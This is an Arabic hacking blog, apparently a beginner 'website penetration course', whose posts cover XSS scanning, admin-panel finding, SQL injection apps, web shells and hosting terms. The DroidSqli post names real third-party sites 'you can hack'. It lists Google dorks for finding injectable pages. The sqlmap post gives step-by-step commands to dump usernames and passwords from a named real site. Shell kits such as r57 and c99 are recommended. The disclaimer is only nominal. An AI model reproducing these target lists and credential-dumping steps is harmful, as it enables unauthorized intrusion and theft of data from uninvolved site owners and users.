‏إظهار الرسائل ذات التسميات دورة إختبار اختراق المواقع. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات دورة إختبار اختراق المواقع. إظهار كافة الرسائل

الاثنين، 14 يونيو 2021

شرح اداة XsSCan لفحص المواقع واستخراج ثغرات XSS


شرح اداة XsSCan لفحص المواقع واستخراج ثغرات XSS


 اليوم هو شرح اداة رائعة جدا لاستخراج ثغرة xss من المواقع وقبل شرح الاداة فسنتعرف على هذه الثغرة على السريع

ما هى ثغرات XSS

ثغرات الـ Cross Site Scripting او ما يُختصر بـ XSS هي ثغرات أمنية منتشرة  في برامج الويب.
من خلال هذه الثغرات يقوم المهاجم بحقن كود برنامج خبيث عادة ما يكون بلغة  JavaScript التي يقوم المتصفح بتنفيد اوامر الكود عندما يتم تحميل الصفحة عند الشخص الثاني (الضحية).
يتم حقن الكود من قبل الشخص المهاجم بطرق عدة منها: وهم الضحية للظغط على رابط (XSS منعكس)، او انتظار الضحية ليتصفح صفحة في الموقع الذي يحتوي على ثغرة من هذا النوع (XSS مخزن).


ما هى اداة XsSCan

هى اداة تستخدم فى الحصول على نقاط الضعف  فى البرمجة النصيه للمواقع ، تعبر هذه الاداة على موقع الويب وتفحص جميع الروابط والنطاقات الفرعية أولا بعد ذلك تبدا فى فحص كل إدخال فى كل صفحة فى الموقع وتظهر قوة الاداة فى البحث عن ثغرات XSS

وتم فحص باستخدام هذه الادة الكثير من المواقع واكتشاف ثغرات نصيه برمجيه بها واشهر هذه المواقع هى :- MIT - Stanford - وموقع جامعة Duke - وموقع oxford - وموقع infomatica - وموقع Motor واربع من المواقع الأخرى 

اقرأ أيضا :-

• مصطلحات وأسئلة تدور حول أساسيات إختراق المواقع

ما هو الشل وكيف يتم رفعه شرح كامل للشل(Shell) لاختراق المواقع

• ما هى الثغرات الأمنية وشرح أخطر ثغرات المواقع الإليكترونية

 ما هى ثغرة SQL وكيف استغلالها {شرح اداة sqlmap لاختراق المواقع مصابة بثغرة sql}

• تطبيق اختراق المواقع عبر الهاتف / شرح تطبيق DroidSqli واختراق المواقع المصابه

• ما هى لوحة التحكم فى المواقع (Control Panel) وكيفية استخراجها عبر تطبيق admin panel


اضغط لتحميل أوامر تثبيت الاداة 

اضغط للاشتراك فى قناة التيلجرام










الأربعاء، 5 مايو 2021

ما هى لوحة التحكم فى المواقع (Control Panel) وكيفية استخراجها عبر تطبيق admin panel finder عبر الهاتف



ما هى لوحة التحكم فى المواقع (Control Panel)


لوحة التحكم (Control Panel) هى الأداة التى يمكن بواسطتها لأى مستخدم و صاحب موقع من إدارة موقعه و محتوياته بشكل كامل و بسيط ، سواء كان هذا الموقع مدونات أو مواقع إخبارية ومواقع شركات ضخمة ، و تضم مهام لوحة التحكم عدة مهام بدءاً من إضافة صفحات جديدة و رفع ملفات لأي مسار او خلق مسارات جديدة ، بمعنى أنها منصة متكاملة لإدارة مواقع الويب .

وهى المنصة التى تقوم بتسجيل الدخول فيها عند اختراق موقع ما وسنتعرف على كيفية استخراج هذه الوحة عبر الهاتف فقط بواسطة تطبيق admin panel finder سهل الاستخدام

شرح تطبيق admin panel finder واستخراج لوحة التحكم


كل ما عليك بعد فتح التطبيق أن تضع رابط الموقع فى الخانه المخصصه لذلك واختيار أول خيار هو php مثلما ف الصورة والضغط على Submit




بعد ذلك سيبدأ التطبيق فى التخمين 






بعد ذلك سيخرج لك رابط صفحة التحكم يمكنك الضغط مطولا لنسخه




رابط تحميل التطبيق :- 

لتحميل التطبيق اضغط هنا










تطبيق اختراق المواقع عبر الهاتف / شرح تطبيق DroidSqli واختراق المواقع المصابه



اختراق المواقع عبر هاتفك الأندرويد وبدون أوامر

تحدثنا سابقا عن ثغرة Sql injections  وكيفية استخراج  المواقع المصابه بها وأيضا شرحنا أداة sqlmap الشهيرة لاختراق المواقع
اليوم سنشرح تطبيق بسيط جدا يمكن تثبيته على هاتفك المحمول واستخدامه وبدء اختراق المواقع المصابة عبر الرابط فقط
تطبيق DroidSqli هو تطبيق بسيط جدا يخترق المواقع المواقع ويستخرج قاعدة البينات الخاصة بها وملفات الموقع كامله
طريقة استخدام التطبيق :-

بعد تحميل التطبيق والدخول عليه يمكنك وضع الرابط فى المكان الاول والضغط على كلمة Inject مثلما فى الصورة 




بعد ذلك سيبدأ التطبيق بالحقن واستخراج ملفات وبيانات الموقع كما بالصورة التالية 



تحميل التطبيق :-

لتحميل التطبيق اضغط هنا

مواقع يمكنكم اختراقها :-

موقع فرنسى يمكنك اختراقه

http://sierrac.free.fr/game.php?id=135

موقع أخبار مصاب

http://www.mmwi.com/newsone.php?open&i=5


موقع  اسرائيلى إخبارى

http://www.isr-tkd.com/index.php?cntr=e/news.php?id=1


شرح استخراج لوحة تحكم المواقع اضغط هنا
دروس اخرى فى دورة اختراق المواقع :-






الدوركات للبحث عن مواقع مصابه

inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
ld.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
***91;quote***93;inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_oinurl:view_product.php?id=


 بعد وضع أى منها فى البحث واختيار اى موقع يمكنك وضع هذه العلامة ( ' )  ف اخر الرابط واذا ظخر خطأ SQL يكون مصاب




الثلاثاء، 9 فبراير 2021

ما هى ثغرة SQL وكيف استغلالها {شرح اداة sqlmap لاختراق المواقع مصابة بثغرة sql} توعية امنية





شرح اداة sqlmap لاختراق المواقع مصابة بثغرة sql
اليوم هو الدرس الرابع من دورة تعلم اختبار اختراق المواقع 
وان شاء سنتحدث عن اداة sqlmap لاختراق المواقع مصابة بثغرة sql 

اضغط هنا للإشتراك فى قناة التيلجرام 

الدرس الاول من دورة اختراق المواقع اضغط هنا 

الدرس الثانى اضغط هنا 

الدرس الثالث اضغط هنا 


فى البداية ما هى ثغرة SQL ؟

sql injection هي من بين أكثر الثغرات تواجدا على مواقع الويب وهي ايضا ببساطة هجوم يتم فيه حقن كود يسمي  SQL بتطبيق الويب  "المتصفح" حتى يتم استخراج بعض البيانات من قاعدة االبيانات التي يعتمد عليها الموقع وهذا بسبب ان الثغرة تعتمد على خطأ وهوعدم معاينة ما يتم إدخاله قبل ان يتم ارساله الي قاعدة البيانات كما يمكن تجاوز نافذة authentication ايضا باستعمال هذه الثغرة

ويوجد انواع عديدة من ثغرة SQL حتى انها حوالى سيع انواع وسنشرحهم قادما ان شاء الله 

كيفية استخراج المواقع المصابة ؟!


 نحتاج إلى دوركات أي نهايات
للحصول على مواقع مصابة بالثغرة نذهب إلى المتصفح وندخل إحدى الدوركات التالية :-

page.php?id=

trainers.php?id=

article.php?ID=

games.php?id=

newsDetail.php?id=

staff.php?id=

products.php?id=

news_view.php?id=

opinions.php?id=

pages.php?id=



ستظهر لنا المواقع المصابة بالثغرة وللتأكد من أنها مصابة بالثغرة نذهب إلى نهاية عنوان الموقع وضع (') هذه النقطة إذا ظهرت لك خطأ أو شيء ٱخر مثل Error :You have an error in your SQL syntax  فإن هذا الموقع مصاب بالثغرة
مثل هذا الموقع وهشرحلكم عليه :- 

www.musculoskeletalsociety.in/page.php?id=5

كيفية استغلال الثغرة ؟!


طبعاً اذا كنت تريد مخترق مواقع مبتدأ والبحث عن مواقع مصابة وثغراتها طبعاً سيكون ابتدائك اولا باختراق مواقع sql وهذا يعتبر اسهل ثغرات لاختراق المواقع اذا كنت تحب اختراق مواقع وكشف ثغرات وتلك الاعمال وكنت مهووس بها ستتمكن من ذلك بعد تعلم ثغرة sql وطريقة برمجتها واستخدامها واختراقها ايضاً والان سنشرح لكم بالتفصيل كيف يتم اختراق ملفات الموقع واستخراج اليوزر والباسورد لكي تستطيع ان تقوم باختراق الموقع

اقدم لكم اداة sqlmap وهى افضل اداة لاستغلال ثغرة SQL واختراق المواقع المصابه بها 
وهذه الاداة تعمل على نظام Termux  ايضا من اجل مستخدمين الأندرويد

ولكن قبل اى شئ قم بتحميل ملف  اوامر تثبيت الاداة

لتحميل أوامر تثبيت الاداة اضغط هنا 



استخدام الأداة sqlmap لاختراق الموقع !!



بعد جلب الموقع المصاب وفتح الاداة  نقم بكتابة الأوامر التالية :-


 python2 sqlmap.py -u 🌐🌐 --dbs

طبعا بدال كلمة 🌐🌐 تقوم باضافة رابط الموقع المصاب SQL
يصبح كذلك :-

python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --dbs


طبعاً الان تم دخول الى ملفات الموقع اي اننا قمنا باختراق الموقع الان نكتب هذا الامر لكي ان تستطيع دخول الى ملف الاساسي للموقع
اكتب هذا الامر :-

 python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D ❌❌ --tables

طبعاً قم بتغيير ❌❌ بكتابة اسم الملف الخاص للموقع

ثم تظهر لك ملفات الموقع الاخرى مثل المقالات الموقع او الحسابات مسجلة في الموقع وبيانات الموظفين والحسابات و كلمات السر الموقع اليوزر النيم والباسورد

تترك كل ملفات لانك لن تحتاجها فقط قم بالبحث عن ملف خاص لبيانات دخول الموقع نقوم بكتابة امر 👇

python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D NameFile -T NAMESITE --columuns


طبعا بدال اسم NAMESITE تقوم بكتابة اسم ملف الخاص للموقع الذي يحتوي على اليوزر والباسورد وعادة تكون اسمها
user site , password , user
وهكذا شبيهة لتلك الاسماء على سبيل مثال ساقوم بفتح ملف اسمها
user_name & password



 هذا الامر لسحب كلمات المرور واليوزر للموقع :-

python2 sqlmap.py -u www.musculoskeletalsociety.in/page.php?id=5 --D NameFile -T NAMESITE --C user_name,password --dump

وبعد كتابة الامر سيظهر لك اليوزر والباسوردات الخاص بالموقع انت فقط يمكنك تغيير اسم ملفات الذي تريده ويمكنك من خلال اليوزر والباسورد اختراق الموقع بكل سهولة




كان معكم ديفل يونكس DEVIL UNEX 
اتمنى ان تكونوا استفدتم من موقعنا الإليكترونى وانا اخلى مسؤليتى من اى تصرف غير شرعى
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل ماهو جديد 

للإشتراك فى قناة التيلجرام اضغط هنا 



الاثنين، 8 فبراير 2021

ما هى الثغرات الأمنية وشرح أخطر ثغرات المواقع الإليكترونية 《الدرس الثالث》


ما هى الثغرات الأمنية وشرح أخطر ثغرات المواقع الإليكترونية؟!!
اليوم ان شاء الله نكمل  دورة تعلم اختبار اختراق المواقع واليوم هو الدرس الثالث من الدورة اتمنى ان يعجبكم 
ولكن قبل ما تنخرط فى الدرس اشترك في قناة التيلجرام ليصلك كل جديد 

للإشتراك فى قناة التيلجرام اضغط هنا 

الدرس الاول من الدورة اضغط هنا

الدرس الثانى اضغط هنا


ولنبدأ الشرح بالصلاة والسلام على رسول الله عليه افضل الصلاة واتم التسليم 

ما هى الثغرات الأمنية ؟!


الثغرة الأمنية (بالإنجليزية: Security Bug)‏ هو مصطلح يطلق على مناطق ضعيفة في أنظمة تشغيل الحاسب، هذه المناطق الضعيفة يمكن التسلل عبرها إلى داخل نظام التشغيل، ومن ثم يتم التعديل فيه لتدميره نهائيا مثلا، أو للتجسس على المعلومات الخاصة لصاحب الحاسب الالي المخترق، أو ما يعرف بجهاز الضحية.

 تظهر الثغرات الأمنية في جميع البرمجيات أيضا وليس فقط أنظمة التشغيل وهي بسبب أخطاء برمجية أثناء تطويرها ارتكبها المطورين وهي تشكل خطرا أمنيا بسبب عدم اكتشافها احيانا لإصدار حل وترقيع لها مثل ثغرات اليوم الصفر (بالإنجليزية: Zero-day)‏ التي دائماً ما يستعين بها القراصنة في جرائمهم الإكترونية.


ما أشهر الثغرات التى تصيب المواقع؟!


Remote File Inclusion ( 1

Out-of-band SQL ( 2

SQL injection example ( 3 

In-band SQLi ( 4

Flash XSS ( 5 

Reflected XSS ( 6 

7 ) Stored XSS

وهذه اشهر سبعة ثغرات أمنية تصيب المواقع وسأبدأ بشرحهم ان شاء الله بشئ من التفصيل وفى الدروس القادمة ان شاء الله سنشرح كل منهم على حده وطريقة استخراجها واستغلالها ومعالجتها

ثغرة Remote File Inclusion

 ثغرة Remote File Inclusion من اخطر الثغرات المتنشرة وخاصة فى الاصدار الرابع من php وخطورتها فى أنها تسمح بإستدعاء ملفات من خارج الموقع وتشغيلها على انها من ملفاته
وتوجد هذه الثغرة بكثرة فى المواقع الخاصة بتدوينات المحتوى مثل Wordpress وجوملا وكما قولت انها تمكنه من رفع ملف على السيرفار وهذا هو رفع الشل الذى تحدثنا عنه فى الدرس الثانى من الدورةوبعد ذلك كل ما عليك هو تنفيذه على السيرافار وستتحكم فى الموقع بشكل كامل 

وان شاء الله سنشرح هذه الثغرة بالتفصيل الممل فى الدروس القادمة

ثغرة SQL injections


sql injection هي من بين أكثر الثغرات تواجدا على مواقع الويب وهي ايضا ببساطة هجوم يتم فيه حقن كود يسمي  SQL بتطبيق الويب  "المتصفح" حتى يتم استخراج بعض البيانات من قاعدة االبيانات التي يعتمد عليها الموقع وهذا بسبب ان الثغرة تعتمد على خطأ وهوعدم معاينة ما يتم إدخاله قبل ان يتم ارساله الي قاعدة البيانات كما يمكن تجاوز نافذة authentication ايضا باستعمال هذه الثغرة

ويوجد انواع عديدة من ثغرة SQL حتى انها حوالى سيع انواع وسنشرحهم قادما ان شاء الله 

ثغرة XSS

ثغرات الـ Cross Site Scripting او ما يُختصر بـ XSS هي ثغرات أمنية منتشرة  في برامج الويب.
من خلال هذه الثغرات يقوم المهاجم بحقن كود برنامج خبيث عادة ما يكون بلغة  JavaScript التي يقوم المتصفح بتنفيد اوامر الكود عندما يتم تحميل الصفحة عند الشخص الثاني (الضحية).
يتم حقن الكود من قبل الشخص المهاجم بطرق عدة منها: وهم الضحية للظغط على رابط (XSS منعكس)، او انتظار الضحية ليتصفح صفحة في الموقع الذي يحتوي على ثغرة من هذا النوع (XSS مخزن).


وسيتم شرح هذه الثغرة تصيليا ان شاء الله فى الدروس القادمة 

والى هنا انتى درس اليوم واتمنى ان ينول اعجابكم 
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل ماهو جديد 

للإشتراك فى قناة التيلجرام اضغط هنا









ما هو الشل وكيف يتم رفعه شرح كامل للشل(Shell) لاختراق المواقع





السلام عليكم ورحمة الله وبركاته 
اهلا ومرحبا بكم في موقعنا الإليكترونى اليوم ان شاء الله هو الدرس الثانى من دورة اختبار اختراق المواقع
تعرفنا فى الدرس السابق عن بعض المفافهيم الاساسية واليوم نكمل اهم شئ وهو الشيل وكيف يتم رفعه وما فائدتة 
لا تنسى الاشتراك فى قناة التيلجرام ليصلك كل جديد 

قناة التيلجرام اضغط هنا 





شرح كامل للشل(Shell) لاختراق المواقع 

الشرح من على صفحة تطوير

اضغط هنا للولوج اليها


ما هو الشل :


الشل هو عباره عن ملف مكتوب بلغه PHP وهو ينصنف على انه اكواد خبيثه وتزرع في اختراق المواقع وتحتوي الشلات على برمجات واكواد خبيثه تصل حتى الان الي 10 اكواد او اكثر ووظيفه هذه الاكواد هي المساعده في تنفيذ الاوامر على السيرفر
---
حتى نفهم الموضوع اكثر بنيجي لتعريف السيرفر ما هو السيرفر السيرفر هو عباره عن جهاز يشبه جهازك الخاص لا فرق كبير لكن يعمل بتقنيه الخادم والزبون اي انه يقوم بتلقي الطلبات من غيره من الحواسيب ويتميز بسرعته العاليه وهو موصول على خط سريع جدا تصل الى 100 ميجا واكثر
---
يمكنك ببساطه تحميل سيرفر اباتشي 2.2 على جهازك الشخصي وهكذا يكون عندك سيرفر من نوع اباتشي او سيرفر ويندوز وهذا السيرفر موجود على سي دي الوندز XP والخدمات العنكبوتيه الي توصلك كلها من السيرفرات
---
مثال على تقنيه الخادم والزبون مثلا انت بدك تتصفح موقع facebook.com طيب اخي هذا موقع فيسبوك موجود على سيرفر اذن انت اعرفت مين الخادم الخادم هو السيرفر والزبون هو انت الان انت كتبت في المتصفح الموقع يتم تحويل الطلب الى السيرفر باستخدام جداول توجيه الشبكات (عباره عن جداول بسيطه تحدد مكان السيرفر) يكون السيرفر ينتطر الطلبات (وظيفته) وعندما يصله طلبك يتاكد من توافره ويرسله لك ويظهر عندك بالمنتصفح والسيرفرات قد تكون بحجم جهازك وقد تكون مخصص لها مبنى كامل خاصه في شركات الاستضافه
قبل لا نرجع لمفهوم الشل بدنا نحكي عن اشي اسمه سكربت هذه الكلمه رح تزهقها من كتر ما رح تسمعها ما هو السكربت هو عباره عن مجموعه من الملفات وقد تكون ملف واحد تثبت على السيرفر وهي ملفات الموقع مثلا منتدى kooora هو عباره عن سكربت vb يحتوي العديد من الملفات واخطرها الملفات الموجوده بمجلد includes مثل ملف confing الموجود فيه بيانات سريه بالمنتدى مثل باسويرد وهيك اشي ما بدي ازي د بلاش تتعقد
.

تعريف الشل :


هو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين والسيرفر ويمكنك من خلاله تنفيذ اوامر تمكنك من السيطره التامه على السيرفر
.

استخدامه :


ان الهكر هم اكثر من يستخدمه لكنهم ليسو الوحيدين مطقا فهناك من يستخدمه لامور قريبه من الهكر يسمونه هكر سلمي او هيك اشي

انواع الشلات ولمحه سريعه عنها :

===============
1- webadmin هذا الشل جيل ومفيد للمبتدئين لأنه يسمحلك برفع الملفات وحذف الملفات وإنشاء مجلد بكل سهولة ولتطبيق أمر معين
---
2- MyShell هذا الشل جميل ولكن قديم وهو يعتمد على أوامر لينكس ويمكنك معرفة صلاحياتك بجانب الجملة Current User ومعرفة كل المجلدات الذي في المجلد الذي تتصفحه
---
3- phpRemoteView شل جميل ومشابه لخصائص الشل webadmin وكل مجلد تود التعديل عليه استخدم الأسهم المقابلة لها ولكن هذا الشل فيه ميزة جميلة وهي انك تقدر تفك تشفير الــ md5 الخاصة بالمنتديات.
---
4- phpshell-1.7 شل جميل وشبيه بالشل MyShell مفيد للمبتدئين
---
5- phpFileManager شل سهل جدا وأوامره واضحة ولا يحتاج إلى شرح
---
6- r57shell الشل الروسي الغني عن التعريف الذي أنا أفضله من بين كل هذه الشلات وهو يحتاج إلى أوامر لينكس ولكن فيه أوامر البحث عن ملفات الكونفج (اعتقد اني ذكرتها سابقا)
---
7- phplab شل جميل ولكنه غير عملي ولا انصح المبتدئين به
---
8- haexplorer شل أيضا جميل ولكن غير عملي ولا انصح المبتدئين باستخدامه
---
9- php exploit lab شل أيضا جميل ولكن أيضا لا انصح المبتدئين به
---
10- C99 شل جميل ورائع وفيه مميزات جميلة وهي إنك تقدر تخترق قاعدة البيانات من خلاله عن طريق الاختيار sql وهذا الشل يسمحلك بتطبيق أوامر لينكس ... بالإضافة إلى إمكانية تصفح الملفات من خلاله كما في الشل webadmin ولكن باختيارات أوسع ...

ما هي اس كيو ال(SQL) :

===========
هي عباره عن لغه برمجيه تعتمد عليها قواعد البيانات بحيث يكون هناك ملف ترتب من خلاله باقي الملفات الاخرى ويحتوي على اهم المعلومات السريه ايضا.
=====

الجمعة، 29 يناير 2021

مصطلحات وأسئلة تدور حول أساسيات إختراق المواقع 《الدرس الاول من دورة اختراق المواقع》






السلام عليكم ورحمة الله وبركاته 
اهلا بكم فى موقعنا الإليكترونى 
اليوم ان شاء الله هو الدرس الاول من دورة اختراق المواقع 
ويجب علينا قبل البدء فى الدورة ان تعرف على بعض المصطلحات والمفاهيم المهمه جدااا 
ويمكنك ايضا تجميل كتاب عربى فى فنون اختراق المواقع والسيرفارات من اسفل المقال

وهذه مجموعة من المصطلحات والأسئلة تدور حول أساسيات إختراق المواقع......




س1 : ‏ما هو الـURL ؟؟


"Uniform Resource Locator" رمز عنوان الموقع

الي هو دة httl:\\[...]

اى رابط الموقع حبيبى الذى تدخل به على الموقع مثل رابط موقعنا 《https://devil5alsaaq.blogspot.com



س2 : ما هو الدومين نيم اسم النطاق (Doumin name)؟


هو إسم تملكه كبطاقة تعريف مثلا تعرف المتصفحين على عنوانك لكي يذهبوا لك ويتصفحوا موقعك

عندما تسجل اسم دومين فذلك يعني أنه اصبح لك عنوان "موقع يعني" على الإنترنت مثلا

[...]


س3 : طيب فين أسجل إسم دومين ؟؟ يتم التسجيل والحجز في المواقع الخاصة بالإستضافة على النت


س4 : ما هي الإستضافة ؟ الإستضافة أو تسكين موقع تعني حجز مساحة على جهاز أو سيرفر مزود هذه الخدمة وذلك لإستخدامها في

إنشاء وتحميل صفحات موقعك وذلك بتسمية هذه المساحة على إسم الدومين نيم الذي تملكه مثل إنشائك

لمجلد في كمبيوترك وتعطيه إسم معين لتخزن فيه ملفات من نوع ما .


س5 :  المتعارف علية من التسمية كالتالي:


com

تعني كوميرشال أو تجاري أي لأغراض شخصية أو تجاريةأي يمكن الإستفادة منها بتقديم خدمات وبيع وشراء

net

‏ تعني network أو شبكة وتستخدم عادة لتزويد خدمات أو إستضافة

‏org

تعني أورغانايزيشن أي منظمة أو هيئه حكومية وهي مخصصة للأغراض الغير ربحية

‏edu

تعني إديوكيشن أي هيئه علميه أو تعليميه وهي مخصصه لهذا الغرض مثل الجامعات والمراكز العلميه

xx

حرفين يرمزان لدولة معينة يعني مثلاً eg تعني egypt

وإختار إلي يناسبك...

س7 : ما هو الـ FTP ؟؟؟ File Transfer Protocol


وسيلة تناقل الملفات ويستخدم بها برامج لهذا الغرض حيث يمكنك عن طريقها تحميل ملفاتك وصفحاتك

الى مساحتك المخصصة على السيرفر

وهي إتصال مباشر بالسيرفر وهناك طريقتان للدخول على السيرفر , إما عن طريق الرقم والمعرف

المزودان لك من قبل الشركة أو يمكنك أن تدخل كضيف على إحدى السيرفرات لفرع مخصص لذلك


س8 : كيف أدخل للftp ؟


يتم الدخول للftp بأجد برامج الFTP أو ممكن أيضاً من المتصفح كالتالي:

[...]

ثم تكتب إسم المعرف وباسورد الدخول


س9 : أين يتم وضع ملفات الموقع ؟


بعد الدخول الى حسابك من خلال الـ اف تي بي FTP تقوم بالدخول الى مجلد اسمه public_html ومن

خلال الدخول الى هذا المجلد يمكن وضع جميع الملفات الخاصة بك

ويجب تسمية الملف الأساسي index.html or index.htm or default.html or default.htm وممكن تكون

بإمتدادات أخرى حسب نوع برنامج النظام الموجود في السيرف



س10 : ماذا يعني تراسل البيانات في الـ Traffic ؟


Traffic يعني حركة المرور للبيانات

وتعني كم من البيانات يمكنك أن ترسل من خلال الإتصال بالمتصفحين وتحسب شهريا . ولكل خطة إستضافة

حجم معين مجاني ويتجدد في بداية كل شهر . وتحسب بالبايت

1KB = 1024 bytes .. 1 MB = 1048,576 bytes


س11 : ماهو الbandwidth ؟


هو الذي يتحكم في كمية البيانات التي تتنتقل من والى الموقع وهذي هي وظيفته الوحيدة وتكمن

فائدته بالنسبة لصاحب الموقع فقط حتى يعرف كم حجم الـ Traffic المنتقل من البيانات من والى الموقع

لانه سيكون محدود بكمية محددة من البيانات مثل كثرة تحميل البرامج للموقع وكذلك مراسلة الاعضاء

وكل هذه تأثر على الباندويث المحدد لكل موقع

وهي عبارة عن عدة الوان

الابيض ومعناه ان الموقع ما زال في السليم ولم يتجاوز المقدار المحدد له

والبرتقالي اقل من 10 جيجا

والاحمر قد تجاوز 10 جيجا 

س12: ‏ما هو الـCGI


Common Gateway Interface أو البوابة البينية المشتركة

وهي مجموعة من القوانين تحكم عمل السيرفر مع برنامج السي جي اي لتنفيذ

أمر ما يطلبه المتصفح وتتطلب مدخلات لكي تزود المعلومات المطلوبة وهي كثيرة

وبرامج الCGI تكون مكتوب بلغة أشرها لغة بريل وسي .

_________________________________



ان  شاء الله فى الدرس القادم سنتعرف على مصطلحات اضافية واكثر اهمية فى اختراق المواقع



قناة التيلجرام اصغط هنا





?? ???? ???????? ????????؟
?????? ??? ?????? ?? ??????? !